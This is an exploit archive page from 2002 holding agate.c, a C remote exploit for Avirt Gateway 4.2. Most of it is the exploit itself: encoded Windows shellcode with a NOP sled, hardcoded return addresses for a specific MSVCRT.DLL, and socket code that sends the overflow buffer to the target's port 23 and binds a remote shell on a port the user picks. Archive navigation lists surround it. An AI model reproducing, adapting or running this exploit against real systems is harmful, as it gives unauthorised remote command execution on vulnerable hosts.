agate.c

agate.c: Posted Feb 19, 2002; Authored by uid0x00; Avirt Gateway 4.2 remote exploit.; tags | exploit, remote; SHA-256 | c7c71b607fa45cf484a658d01ea6310238e1dd14cda3695bca1c9028168cf405; Download | Favorite | View

agate.c

/* agate.c by uid0x00
 * Avirt Gateway 4.2 remote exploit 
 * compile with gcc agate.c -o agate
 *
 * thx to ByteRage, exploit is based on his shellcode
 *
 *Disclaimer:
 *Use of this information constitutes acceptance for use in an AS IS condition. There are
 *NO warranties with regard to this information. In no event shall the author
 *be liable for any damages whatsoever arising out of or in connection with
 *the use or spread of this information. Any use of this information is at the
 *user's own risk.
 */

/* Set the following three defines according to the DLL we use */

// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

#include <stdio.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
  int s;
  struct sockaddr_in SockAdr;
  char exploit[1024];
  unsigned short int      a_port;

  char shellcode[] =

/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";

/* ==== SHELLC0DE ENDS ==== */

  printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)\n\n");

  if(argc < 3) {
    printf("usage:\t%s <ip#> <port#>\n", argv[0]);
    return 0;
  }

  //insert shell port  
  a_port = htons(atoi(argv[2]));
  a_port^= 0x9999;
  shellcode[964] = (a_port) & 0xff;
  shellcode[965] = (a_port >> 8) & 0xff;

  //init the exploit buffer
  memset(&exploit, '\xCC', 0x200);
  memcpy(&exploit, &shellcode, sizeof(shellcode)-1);
    
  printf("initialising socket\n");
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
  if (s) {
    printf("...initialized\n");

    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(23);

    printf("trying to connect\n");
    if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
      printf("...connected\n");
      printf("(waiting)\n");
      sleep(3);

      printf("sending exploit\n");
      send(s, exploit, sizeof(exploit), 0);
      printf("...sent\n");

      printf("(waiting)\n");
      sleep(3);

      printf("...closed\nshell bound to port %s \n", argv[2]);
      close(s);
    }
    else {
      printf("... failed :( errno = %i\n", errno);
      close(s);
      return(0);
    }
  }
}

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

agate.c

agate.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

agate.c

Share This

agate.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems